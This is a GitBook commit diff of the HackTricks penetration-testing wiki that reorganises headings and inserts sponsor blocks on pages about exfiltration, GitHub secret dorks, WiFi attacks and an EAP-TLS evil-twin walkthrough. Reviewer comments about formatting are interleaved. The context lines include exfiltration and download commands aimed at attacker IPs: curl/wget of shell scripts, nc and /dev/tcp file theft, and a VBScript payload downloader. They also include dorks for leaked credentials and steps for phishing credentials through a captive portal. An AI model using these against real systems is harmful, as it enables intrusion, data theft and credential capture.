GitBook: [#3289] No subject

This commit is contained in:
CPol 2022-06-28 10:36:33 +00:00 committed by gitbook-bot
parent 6fe4fd2ace
commit fa0d025cbf
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
5 changed files with 105 additions and 52 deletions

View File

@ -1,4 +1,4 @@
# Exfiltration
<details>
@ -16,26 +16,32 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
# Copy\&Paste Base64
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
### Linux
## Copy\&Paste Base64
#### Linux
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
### Windows
#### Windows
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
# HTTP
## HTTP
### Linux
#### Linux
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
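Review bot: the asset path `image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png` referenced by the new hint block looks like a repeatedly re-uploaded copy of the same image; point the `<img>` at the canonical asset (or rename it) so `.gitbook/assets` does not keep accumulating duplicates. While the `#### Windows` heading is being touched here, the untagged fence under it holding the `certutil -encode` / `certutil -decode` lines could get a language tag like the `bash` fence above it.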
@ -44,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
### Windows
#### Windows
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -61,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
## Upload files
### Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
## **HTTPS Server**
### **HTTPS Server**
```python
# from https://gist.github.com/dergachev/7028596
@ -108,23 +114,23 @@ if __name__ == "__main__":
###
```
# FTP
## FTP
## FTP server (python)
### FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
## FTP server (NodeJS)
### FTP server (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
## FTP server (pure-ftp)
### FTP server (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
@ -144,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
## **Windows** client
### **Windows** client
```bash
#Work well with python. With pure-ftp use fusr:ftp
@ -157,7 +163,14 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
# SMB
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## SMB
Kali as server
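Review bot: this is the second verbatim copy of the Intigriti hint block in this file (one sits at the top of the page and a third follows the DNS section); keeping the sponsor block in one reusable snippet instead of pasting it three times would turn future wording or URL changes into a single edit.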
@ -168,7 +181,7 @@ kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Or create a **smb **share **using samba**:
Or create a \*\*smb \*\*share **using samba**:
```bash
apt-get install samba
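Review bot: escaping `**smb **` to `\*\*smb \*\*` leaves literal asterisks in the rendered sentence; the bold was broken by the space before the closing `**`, so the fix is `Or create a **smb** share **using samba**:`.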
@ -195,7 +208,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk:
```
# SCP
## SCP
The attacker has to have SSHd running.
@ -203,23 +216,23 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename>
```
# NC
## NC
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
# /dev/tcp
## /dev/tcp
## Download file from victim
### Download file from victim
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
## Upload file to victim
### Upload file to victim
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -230,7 +243,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_**
# **ICMP**
## **ICMP**
```bash
#In order to exfiltrate the content of a file via pings you can do:
@ -250,7 +263,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet)
```
# **SMTP**
## **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@ -258,7 +271,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25
```
# TFTP
## TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
@ -284,7 +297,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
```
# PHP
## PHP
Download a file with a PHP oneliner:
@ -292,13 +305,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
# VBScript
## VBScript
```bash
Attacker> python -m SimpleHTTPServer 80
```
### Victim
#### Victim
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -332,7 +345,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
# Debug.exe
## Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@ -350,10 +363,16 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
# DNS
## DNS
[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
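Review bot: the new hint block lands directly before the closing `<details>` support footer, so the DNS section (now a single bulleted link) is followed by two promotional blocks back to back; placing the sponsor block higher up, or dropping this third copy, keeps the end of the page readable.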
@ -370,5 +389,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View File

@ -162,10 +162,12 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Subdomains
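Review bot: the two `**Bug bounty tip**` lines in this hunk differ only in the trailing `\\`, which renders as a literal backslash or stray hard break before the `{% embed %}`; make sure the line that survives is the one without it, and check that the `\` after the `<img>` tag is still wanted as a line break.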

View File

@ -1,4 +1,4 @@
# Github Leaked Secrets
<details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
## Api keys leaks in github
### Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
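Review bot: since the `Api keys leaks in github` heading is being edited anyway, fix its wording to `API key leaks in GitHub` in the same change.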
@ -31,7 +37,7 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
## **Dorks**
### **Dorks**
```bash
".mlab.com password"
@ -315,8 +321,6 @@ AWS SECRET
"private" extension:pgp
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -332,5 +336,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View File

@ -18,6 +18,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Wifi basic commands
```bash
@ -296,6 +303,13 @@ So broken and disappeared that I am not going to talk about it. Just know that _
![](<../../.gitbook/assets/image (125).png>)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## WPA/WPA2 PSK
### PMKID
@ -794,6 +808,15 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
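Review bot: the context line directly above the new hint block is a TODO with a Spanish parenthetical (`login con facebook e imitacionde WPA en captive portals`); while this area is being edited, translate it to English (`Facebook login and WPA imitation in captive portals`) so the page reads in one language.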

View File

@ -1,4 +1,4 @@
# Evil Twin EAP-TLS
<details>
@ -16,16 +16,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\
Anyway, it's easy to make them work. \
Anyway, it's easy to make them work.\
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
# Evil Twin for EAP-TLS
## Evil Twin for EAP-TLS
**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
## The Uncommon Case: Attacking EAP-TLS
### The Uncommon Case: Attacking EAP-TLS
Earlier I mentioned a less common wireless network configuration that we had to deal with during this project. This scheme is based on EAP-TLS, where the supplicant will have to present a valid client certificate to the authentication server before being granted access to the network.
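Review bot: the paragraph whose line break is being adjusted (`Anyway, it's easy to make them work.\`) still reads `the post bellow` and `the steps ... wasn't working`; correct these to `below` and `weren't working` in the same edit, and consider replacing the trailing-backslash hard breaks with separate paragraphs.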
@ -43,7 +49,7 @@ This means that the supplicant configuration was too lax, and it was accepting a
After seeing this error and searching the Web, we realized it was not that common to exploit this scenario -judging by the lack of information on blogs related to this matter and that we had to deal with it somehow.
## [MiTM Attack Defining the Objective](https://versprite.com/tag/mitm/)
### [MiTM Attack Defining the Objective](https://versprite.com/tag/mitm/)
As you might have guessed already, the idea here is to tweak our tool to make it accept any certificate provided by occasional supplicants to let the victim establish a full connection with our malicious Wireless infrastructure and then [perform a man-in-the-middle attack](https://versprite.com/tag/mitm/) between the victim and the Internet, showing a captive portal to capture plaintext credentials as a first step.
@ -87,21 +93,21 @@ To quickly leverage it, we decided to take the portion of the code from Wifiphis
Now that we have all the elements, lets perform the attack against a victim and see how all this would be from an attacker perspective:
### 1. Lets check the environment with airodump-ng
#### 1. Lets check the environment with airodump-ng
![airodump-ng](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.35.48-PM.png)
From the output, we can identify the access point BSSID (F4:EC:38:FA:E7:57) to which our victim (00:0F:60:07:95:D7) is connected to the WPA2-enterprise network named “enterprise” (ESSID).
### 2. Run the modified hostapd-wpe tool to create a fake AP for the target network
#### 2. Run the modified hostapd-wpe tool to create a fake AP for the target network
![modified modified hostapd-wpe](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.36.29-PM.png)
### 3. Customize the captive portal template (e.g. HTML login) to make it familiar for your target audience (victims) and run it
#### 3. Customize the captive portal template (e.g. HTML login) to make it familiar for your target audience (victims) and run it
![Customize the captive portal](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.02-PM.png)
### 4. Perform a de-auth attack and assume the risk (if you are impatient)
#### 4. Perform a de-auth attack and assume the risk (if you are impatient)
![de-auth attack](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.36-PM.png)
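Review bot: the step headings being demoted to `####` still read `Lets check the environment` and `lets perform the attack`; correct them to `Let's` while renaming them. The `![modified modified hostapd-wpe]` alt text also repeats a word.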
@ -111,7 +117,7 @@ As a result, we will see on the modified hostapd-wpe tools output the followi
This suggests a victim (00:0f:60:07:95:d7) has connected to our fake AP.
On the victims Windows host, we observe it automatically connected to the fake AP, and as soon as web navigation is tried, the user is presented the captive portal:
On the victims Windows host, we observe it automatically connected to the fake AP, and as soon as web navigation is tried, the user is presented the captive portal:
![captive portal credentials](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.38.54-PM.png)
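Review bot: the before and after versions of `On the victims Windows host, we observe ...` read identically in this view, so whatever was changed on that line is not visible; either way `victims` should be `victim's`.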
@ -133,7 +139,12 @@ Although we can read different online articles stating that EAP-TLS is the most
The whole security of this scheme relies, again, on the weakest link in the chain, which might be a device or host configured to accept any certificate presented by the authentication server or a mobile device used by an unconscious user that accepts it without considering the risk of this action.
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>
@ -150,5 +161,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>